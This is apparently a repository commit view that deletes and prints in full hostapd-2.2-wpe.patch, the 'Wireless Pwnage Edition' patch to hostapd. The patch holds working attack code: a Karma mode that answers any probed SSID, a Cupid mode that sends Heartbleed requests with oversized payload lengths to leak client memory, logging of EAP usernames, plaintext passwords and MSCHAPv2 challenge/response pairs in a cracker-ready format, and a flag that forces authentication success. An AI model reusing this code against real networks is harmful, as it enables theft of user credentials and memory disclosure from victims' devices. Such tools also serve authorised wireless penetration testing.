+ //data->state = FAILURE;
+ //return;
}
switch (data->state) {

884
net-wireless/hostapd/files/hostapd-2.2-wpe.patch
View file

@ -1,884 +0,0 @@
diff -rupN hostapd-2.2/hostapd/config_file.c hostapd-2.2-wpe/hostapd/config_file.c
--- hostapd-2.2/hostapd/config_file.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/hostapd/config_file.c 2014-08-14 08:45:54.629127667 -0400
@@ -20,7 +20,7 @@
#include "ap/wpa_auth.h"
#include "ap/ap_config.h"
#include "config_file.h"
-
+#include "wpe/wpe.h"
#ifndef CONFIG_NO_RADIUS
#ifdef EAP_SERVER
@@ -1955,6 +1955,20 @@ static int hostapd_config_fill(struct ho
return 1;
}
wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version);
+ } else if (os_strcmp(buf, "wpe_logfile") == 0) {
+ wpe_conf.wpe_logfile = os_strdup(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) {
+ wpe_conf.wpe_hb_send_before_handshake = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) {
+ wpe_conf.wpe_hb_send_before_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) {
+ wpe_conf.wpe_hb_send_after_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) {
+ wpe_conf.wpe_hb_payload_size = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) {
+ wpe_conf.wpe_hb_num_repeats = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) {
+ wpe_conf.wpe_hb_num_tries = atoi(pos);
#ifdef EAP_SERVER
} else if (os_strcmp(buf, "eap_authenticator") == 0) {
bss->eap_server = atoi(pos);
diff -rupN hostapd-2.2/hostapd/main.c hostapd-2.2-wpe/hostapd/main.c
--- hostapd-2.2/hostapd/main.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/hostapd/main.c 2014-08-14 08:45:54.637127773 -0400
@@ -27,7 +27,7 @@
#include "config_file.h"
#include "eap_register.h"
#include "ctrl_iface.h"
-
+#include "wpe/wpe.h"
struct hapd_global {
void **drv_priv;
@@ -412,11 +412,17 @@ static int hostapd_global_run(struct hap
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR "\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2014, Jouni Malinen <j@w1.fi> "
- "and contributors\n");
+ "and contributors\n"
+ "-----------------------------------------------------\n"
+ "WPE (Wireless Pwnage Edition)\n"
+ "This version has been cleverly modified to target\n"
+ "wired and wireless users.\n"
+ "Brad Antoniewicz <@brad_anton>\n"
+ "Foundstone\n");
}
@@ -425,7 +431,7 @@ static void usage(void)
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd [-hdBKtvskc] [-P <PID file>] [-e <entropy file>] "
"\\\n"
" [-g <global ctrl_iface>] [-G <group>] \\\n"
" <configuration file(s)>\n"
@@ -447,7 +453,12 @@ static void usage(void)
" (records all messages regardless of debug verbosity)\n"
#endif /* CONFIG_DEBUG_LINUX_TRACING */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n\n"
+ " WPE Options -------------------\n"
+ " (credential logging always enabled)\n"
+ " -s Return Success where possible\n"
+ " -k Karma Mode (Respond to all probes)\n"
+ " -c Cupid Mode (Heartbleed clients)\n\n");
exit(1);
}
@@ -554,7 +565,7 @@ int main(int argc, char *argv[])
interfaces.global_ctrl_sock = -1;
for (;;) {
- c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:");
+ c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:kcs");
if (c < 0)
break;
switch (c) {
@@ -615,6 +626,15 @@ int main(int argc, char *argv[])
case 'u':
return gen_uuid(optarg);
#endif /* CONFIG_WPS */
+ case 'k':
+ wpe_conf.wpe_enable_karma++;
+ break;
+ case 'c':
+ wpe_conf.wpe_enable_cupid++;
+ break;
+ case 's':
+ wpe_conf.wpe_enable_return_success++;
+ break;
default:
usage();
break;
diff -rupN hostapd-2.2/hostapd/Makefile hostapd-2.2-wpe/hostapd/Makefile
--- hostapd-2.2/hostapd/Makefile 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/hostapd/Makefile 2014-08-14 08:45:54.641127921 -0400
@@ -59,6 +59,7 @@ OBJS += ../src/ap/preauth_auth.o
OBJS += ../src/ap/pmksa_cache_auth.o
OBJS += ../src/ap/ieee802_11_shared.o
OBJS += ../src/ap/beacon.o
+OBJS += ../src/wpe/wpe.o
OBJS_c = hostapd_cli.o ../src/common/wpa_ctrl.o ../src/utils/os_$(CONFIG_OS).o
@@ -913,15 +914,15 @@ install: all
BCHECK=../src/drivers/build.hostapd
-hostapd: $(BCHECK) $(OBJS)
- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
+hostapd: $(BCHECK) $(OBJS)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
@$(E) " LD " $@
ifdef CONFIG_WPA_TRACE
OBJS_c += ../src/utils/trace.o
endif
-hostapd_cli: $(OBJS_c)
- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
+hostapd_cli: $(OBJS_c)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
@$(E) " LD " $@
NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS) ../src/crypto/md5.o
diff -rupN hostapd-2.2/src/ap/beacon.c hostapd-2.2-wpe/src/ap/beacon.c
--- hostapd-2.2/src/ap/beacon.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/ap/beacon.c 2014-08-14 08:45:54.641127921 -0400
@@ -28,7 +28,7 @@
#include "beacon.h"
#include "hs20.h"
#include "dfs.h"
-
+#include "wpe/wpe.h"
#ifdef NEED_AP_MLME
@@ -582,6 +582,13 @@ void handle_probe_req(struct hostapd_dat
}
#endif /* CONFIG_P2P */
+ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) {
+ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len));
+ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len);
+ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len);
+ hapd->conf->ssid.ssid_len = elems.ssid_len;
+ }
+
res = ssid_match(hapd, elems.ssid, elems.ssid_len,
elems.ssid_list, elems.ssid_list_len);
if (res != NO_SSID_MATCH) {
diff -rupN hostapd-2.2/src/ap/ieee802_11.c hostapd-2.2-wpe/src/ap/ieee802_11.c
--- hostapd-2.2/src/ap/ieee802_11.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/ap/ieee802_11.c 2014-08-14 08:45:54.641127921 -0400
@@ -39,7 +39,7 @@
#include "wnm_ap.h"
#include "ieee802_11.h"
#include "dfs.h"
-
+#include "wpe/wpe.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -790,8 +790,8 @@ static u16 check_ssid(struct hostapd_dat
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
HOSTAPD_LEVEL_INFO,
"Station tried to associate with unknown SSID "
diff -rupN hostapd-2.2/src/crypto/ms_funcs.c hostapd-2.2-wpe/src/crypto/ms_funcs.c
--- hostapd-2.2/src/crypto/ms_funcs.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/crypto/ms_funcs.c 2014-08-14 08:45:54.649128041 -0400
@@ -78,7 +78,7 @@ static int utf8_to_ucs2(const u8 *utf8_s
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -rupN hostapd-2.2/src/crypto/ms_funcs.h hostapd-2.2-wpe/src/crypto/ms_funcs.h
--- hostapd-2.2/src/crypto/ms_funcs.h 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/crypto/ms_funcs.h 2014-08-14 08:45:54.649128041 -0400
@@ -9,6 +9,10 @@
#ifndef MS_FUNCS_H
#define MS_FUNCS_H
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
int generate_nt_response(const u8 *auth_challenge, const u8 *peer_challenge,
const u8 *username, size_t username_len,
const u8 *password, size_t password_len,
diff -rupN hostapd-2.2/src/crypto/tls_openssl.c hostapd-2.2-wpe/src/crypto/tls_openssl.c
--- hostapd-2.2/src/crypto/tls_openssl.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/crypto/tls_openssl.c 2014-08-14 08:45:54.653128013 -0400
@@ -20,6 +20,7 @@
#include <openssl/err.h>
#include <openssl/pkcs12.h>
#include <openssl/x509v3.h>
+#include <openssl/rand.h>
#ifndef OPENSSL_NO_ENGINE
#include <openssl/engine.h>
#endif /* OPENSSL_NO_ENGINE */
@@ -28,6 +29,8 @@
#include "crypto.h"
#include "tls.h"
+#include "wpe/wpe.h"
+
#if OPENSSL_VERSION_NUMBER >= 0x0090800fL
#define OPENSSL_d2i_TYPE const unsigned char **
#else
@@ -71,6 +74,8 @@ static BIO * BIO_from_keystore(const cha
}
#endif /* ANDROID */
+int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top
+
static int tls_openssl_ref_count = 0;
struct tls_context {
@@ -1029,7 +1034,10 @@ struct tls_connection * tls_connection_i
conn->context = context;
SSL_set_app_data(conn->ssl, conn);
- SSL_set_msg_callback(conn->ssl, tls_msg_cb);
+ if (wpe_conf.wpe_enable_cupid)
+ SSL_set_msg_callback(conn->ssl, wpe_hb_cb);
+ else
+ SSL_set_msg_callback(conn->ssl, tls_msg_cb);
SSL_set_msg_callback_arg(conn->ssl, conn);
options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 |
SSL_OP_SINGLE_DH_USE;
@@ -2552,8 +2560,10 @@ static struct wpabuf *
openssl_handshake(struct tls_connection *conn, const struct wpabuf *in_data,
int server)
{
- int res;
+ int res,i;
struct wpabuf *out_data;
+ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2;
+
/*
* Give TLS handshake data from the server (if available) to OpenSSL
@@ -2613,6 +2623,25 @@ openssl_handshake(struct tls_connection
}
wpabuf_put(out_data, res);
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) {
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n");
+ wpe_hb_ptr1 = NULL;
+ for (i=0; i < wpe_conf.wpe_hb_num_repeats; i++) {
+ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1);
+ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1);
+ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1);
+ if (wpe_hb_ptr1) {
+ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2);
+ } else {
+ wpe_hb_ptr1 = wpe_hb_ptr2;
+ }
+ }
+ conn->ssl->tlsext_hb_pending = 1;
+ wpe_conf.wpe_hb_num_tries--;
+ return wpe_hb_ptr1;
+ }
+
return out_data;
}
@@ -2722,6 +2751,10 @@ struct wpabuf * tls_connection_encrypt(v
tls_show_errors(MSG_INFO, __func__, "BIO_reset failed");
return NULL;
}
+
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata)
+ wpe_hb_enc(conn);
+
res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data));
if (res < 0) {
tls_show_errors(MSG_INFO, __func__,
@@ -2729,6 +2762,10 @@ struct wpabuf * tls_connection_encrypt(v
return NULL;
}
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata)
+ wpe_hb_enc(conn);
+
+
/* Read encrypted data to be sent to the server */
buf = wpabuf_alloc(wpabuf_len(in_data) + 300);
if (buf == NULL)
@@ -3544,3 +3581,63 @@ int tls_connection_set_session_ticket_cb
return -1;
#endif /* EAP_FAST || EAP_FAST_DYNAMIC || EAP_SERVER_FAST */
}
+
+int wpe_hb_enc(struct tls_connection *conn) {
+ unsigned char *cbuf, *p;
+
+ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */
+ unsigned int padding = 16; //default: 16 /* Use minimum padding */
+
+ if (!SSL_is_init_finished(conn->ssl)) {
+ return -1;
+ }
+
+ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
+ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) {
+ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n");
+ } else {
+ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n");
+ }
+
+ /* Check if padding is too long, payload and padding
+ * must not exceed 2^14 - 3 = 16381 bytes in total.
+ */
+ OPENSSL_assert(real_payload + padding <= 16381);
+
+ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding);
+
+ if(cbuf==NULL)
+ return -1;
+
+ p = cbuf;
+
+ *p++ = TLS1_HB_REQUEST;
+
+
+ /* Payload length (18 bytes here) */
+ //s2n(payload, p); /* standards compliant payload */
+ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */
+ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */
+
+ /* Sequence number */
+ s2n(conn->ssl->tlsext_hb_seq, p);
+ /* 16 random bytes */
+ RAND_pseudo_bytes(p, 16);
+ //RAND_bytes(p, 16);
+ p += 16;
+ /* Random padding */
+ RAND_pseudo_bytes(p, padding);
+ //RAND_bytes(p, padding);
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size);
+ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding);
+
+ /* Send heartbeat request */
+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT,
+ cbuf, 3 + real_payload + padding) >= 0)
+ conn->ssl->tlsext_hb_pending = 1;
+ OPENSSL_free(cbuf);
+
+ return 0;
+}
+
diff -rupN hostapd-2.2/src/eap_server/eap_server.c hostapd-2.2-wpe/src/eap_server/eap_server.c
--- hostapd-2.2/src/eap_server/eap_server.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server.c 2014-08-14 08:45:54.653128013 -0400
@@ -22,7 +22,8 @@
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
-#define EAP_MAX_AUTH_ROUNDS 50
+//#define EAP_MAX_AUTH_ROUNDS 50
+#define EAP_MAX_AUTH_ROUNDS 50000 // wpe >:)
static void eap_user_free(struct eap_user *user);
@@ -95,6 +96,8 @@ int eap_user_get(struct eap_sm *sm, cons
{
struct eap_user *user;
+ char ident = 't';
+
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
return -1;
@@ -106,6 +109,11 @@ int eap_user_get(struct eap_sm *sm, cons
if (user == NULL)
return -1;
+ if (phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -rupN hostapd-2.2/src/eap_server/eap_server_mschapv2.c hostapd-2.2-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-2.2/src/eap_server/eap_server_mschapv2.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server_mschapv2.c 2014-08-14 08:45:54.653128013 -0400
@@ -12,7 +12,7 @@
#include "crypto/ms_funcs.h"
#include "crypto/random.h"
#include "eap_i.h"
-
+#include "wpe/wpe.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -291,7 +291,7 @@ static void eap_mschapv2_process_respons
size_t username_len, user_len;
int res;
char *buf;
-
+ u8 wpe_challenge_hash[8];
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
if (pos == NULL || len < 1)
@@ -329,6 +329,8 @@ static void eap_mschapv2_process_respons
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, wpe_challenge_hash);
+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
buf = os_malloc(name_len * 4 + 1);
if (buf) {
@@ -393,6 +395,11 @@ static void eap_mschapv2_process_respons
return;
}
+ if (wpe_conf.wpe_enable_return_success) {
+ os_memset((void *)nt_response, 0, 24);
+ os_memset((void *)expected, 0, 24);
+ }
+
if (os_memcmp(nt_response, expected, 24) == 0) {
const u8 *pw_hash;
u8 pw_hash_buf[16], pw_hash_hash[16];
@@ -430,6 +437,8 @@ static void eap_mschapv2_process_respons
wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response");
data->state = FAILURE_REQ;
}
+ if (wpe_conf.wpe_enable_return_success)
+ data->state = SUCCESS;
}
diff -rupN hostapd-2.2/src/eap_server/eap_server_peap.c hostapd-2.2-wpe/src/eap_server/eap_server_peap.c
--- hostapd-2.2/src/eap_server/eap_server_peap.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server_peap.c 2014-08-14 08:45:54.653128013 -0400
@@ -17,7 +17,7 @@
#include "eap_common/eap_tlv_common.h"
#include "eap_common/eap_peap_common.h"
#include "tncs.h"
-
+#include "wpe/wpe.h"
/* Maximum supported PEAP version
* 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt
@@ -850,7 +850,7 @@ auth_method:
eap_peap_state(data, PHASE2_METHOD);
next_type = sm->user->methods[0].method;
sm->user_eap_method_index = 1;
- wpa_printf(MSG_DEBUG, "EAP-PEAP: try EAP type %d", next_type);
+ wpa_printf(MSG_DEBUG, "EAP-PEAPa: try EAP type %d", next_type);
eap_peap_phase2_init(sm, data, next_type);
}
#endif /* EAP_SERVER_TNC */
@@ -969,8 +969,8 @@ static void eap_peap_process_phase2_resp
break;
}
#endif /* EAP_SERVER_TNC */
-
- eap_peap_state(data, PHASE2_METHOD);
+ eap_peap_state(data, PHASE2_METHOD);
+ //data->tlv_request = TLV_REQ_SUCCESS ;
next_type = sm->user->methods[0].method;
sm->user_eap_method_index = 1;
wpa_printf(MSG_DEBUG, "EAP-PEAP: try EAP type %d", next_type);
@@ -986,8 +986,7 @@ static void eap_peap_process_phase2_resp
__func__, data->state);
break;
}
-
- eap_peap_phase2_init(sm, data, next_type);
+ eap_peap_phase2_init(sm, data, next_type);
}
diff -rupN hostapd-2.2/src/eap_server/eap_server_ttls.c hostapd-2.2-wpe/src/eap_server/eap_server_ttls.c
--- hostapd-2.2/src/eap_server/eap_server_ttls.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server_ttls.c 2014-08-14 08:45:54.657127982 -0400
@@ -16,7 +16,7 @@
#include "eap_server/eap_tls_common.h"
#include "eap_common/chap.h"
#include "eap_common/eap_ttls.h"
-
+#include "wpe/wpe.h"
#define EAP_TTLS_VERSION 0
@@ -508,9 +508,11 @@ static void eap_ttls_process_phase2_pap(
return;
}
- if (sm->user->password_len != user_password_len ||
+ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len);
+
+ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len ||
os_memcmp(sm->user->password, user_password, user_password_len) !=
- 0) {
+ 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password");
eap_ttls_state(data, FAILURE);
return;
@@ -570,8 +572,10 @@ static void eap_ttls_process_phase2_chap
/* MD5(Ident + Password + Challenge) */
chap_md5(password[0], sm->user->password, sm->user->password_len,
challenge, challenge_len, hash);
+
+ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len);
- if (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0) {
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password");
eap_ttls_state(data, SUCCESS);
} else {
@@ -630,8 +634,11 @@ static void eap_ttls_process_phase2_msch
else
nt_challenge_response(challenge, sm->user->password,
sm->user->password_len, nt_response);
+
+ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24);
+
- if (os_memcmp(nt_response, response + 2 + 24, 24) == 0) {
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response");
eap_ttls_state(data, SUCCESS);
} else {
@@ -652,7 +659,7 @@ static void eap_ttls_process_phase2_msch
u8 *response, size_t response_len)
{
u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge,
- *auth_challenge;
+ *auth_challenge, wpe_challenge_hash[8];
size_t username_len, i;
if (challenge == NULL || response == NULL ||
@@ -734,8 +741,11 @@ static void eap_ttls_process_phase2_msch
sm->user->password_len,
nt_response);
}
+ rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
+
+ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24);
- rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
if (os_memcmp(nt_response, rx_resp, 24) == 0) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAPV2: Correct "
"NT-Response");
diff -rupN hostapd-2.2/src/Makefile hostapd-2.2-wpe/src/Makefile
--- hostapd-2.2/src/Makefile 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/Makefile 2014-08-14 08:45:54.657127982 -0400
@@ -1,4 +1,4 @@
-SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps
+SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps wpe
all:
for d in $(SUBDIRS); do [ -d $$d ] && $(MAKE) -C $$d; done
diff -rupN hostapd-2.2/src/utils/wpa_debug.c hostapd-2.2-wpe/src/utils/wpa_debug.c
--- hostapd-2.2/src/utils/wpa_debug.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/utils/wpa_debug.c 2014-08-14 08:45:54.657127982 -0400
@@ -30,7 +30,7 @@ static FILE *wpa_debug_tracing_file = NU
int wpa_debug_level = MSG_INFO;
-int wpa_debug_show_keys = 0;
+int wpa_debug_show_keys = 1; // WPE >:)
int wpa_debug_timestamp = 0;
diff -rupN hostapd-2.2/src/wpe/Makefile hostapd-2.2-wpe/src/wpe/Makefile
--- hostapd-2.2/src/wpe/Makefile 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.2-wpe/src/wpe/Makefile 2014-08-14 08:45:54.657127982 -0400
@@ -0,0 +1,8 @@
+all:
+ @echo Nothing to be made.
+
+clean:
+ rm -f *~ *.o *.d *.gcno *.gcda *.gcov
+
+install:
+ @echo Nothing to be made.
diff -rupN hostapd-2.2/src/wpe/wpe.c hostapd-2.2-wpe/src/wpe/wpe.c
--- hostapd-2.2/src/wpe/wpe.c 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.2-wpe/src/wpe/wpe.c 2014-08-14 08:47:02.353123957 -0400
@@ -0,0 +1,209 @@
+/*
+ wpe.c -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks that have been modified to some extend.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+
+#include <time.h>
+#include <openssl/ssl.h>
+#include "includes.h"
+#include "common.h"
+#include "wpe/wpe.h"
+#include "utils/wpa_debug.h"
+
+#define wpe_logfile_default_location "./hostapd-wpe.log"
+
+
+#define MSCHAPV2_CHAL_HASH_LEN 8
+#define MSCHAPV2_CHAL_LEN 16
+#define MSCHAPV2_RESP_LEN 24
+
+char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff";
+size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]);
+
+struct wpe_config wpe_conf = {
+ .wpe_logfile = wpe_logfile_default_location,
+ .wpe_logfile_fp = NULL,
+ .wpe_enable_karma = 0,
+ .wpe_enable_cupid = 0,
+ .wpe_enable_return_success = 0,
+ .wpe_hb_send_before_handshake = 1,
+ .wpe_hb_send_before_appdata = 0,
+ .wpe_hb_send_after_appdata = 0,
+ .wpe_hb_payload_size = 50000,
+ .wpe_hb_num_tries = 1,
+ .wpe_hb_num_repeats = 10
+};
+
+void wpe_log_file_and_stdout(char const *fmt, ...) {
+
+ if ( wpe_conf.wpe_logfile_fp == NULL ) {
+ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a");
+ if ( wpe_conf.wpe_logfile_fp == NULL )
+ printf("WPE: Cannot file log file");
+ }
+
+ va_list ap;
+
+ va_start(ap, fmt);
+ vprintf(fmt, ap);
+ va_end(ap);
+
+ va_start(ap, fmt);
+ if ( wpe_conf.wpe_logfile_fp != NULL )
+ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap);
+ va_end(ap);
+}
+
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t challenge:\t");
+ for (x=0; x<challenge_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",challenge[x]);
+ wpe_log_file_and_stdout("%02x\n",challenge[x]);
+
+ wpe_log_file_and_stdout("\t response:\t");
+ for (x=0; x<response_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",response[x]);
+ wpe_log_file_and_stdout("%02x\n",response[x]);
+
+ if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) {
+ wpe_log_file_and_stdout("\t jtr NETNTLM:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout(":$NETNTLM$");
+
+ for (x=0; x<challenge_len; x++)
+ wpe_log_file_and_stdout("%02x",challenge[x]);
+ wpe_log_file_and_stdout("$");
+ for (x=0; x<response_len; x++)
+ wpe_log_file_and_stdout("%02x",response[x]);
+ wpe_log_file_and_stdout("\n");
+ }
+}
+
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s",type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t password:\t");
+ for (x=0; x<password_len; x++)
+ wpe_log_file_and_stdout("%c",password[x]);
+ wpe_log_file_and_stdout("\n");
+}
+
+/*
+ Taken from asleap, who took from nmap, who took from tcpdump :)
+*/
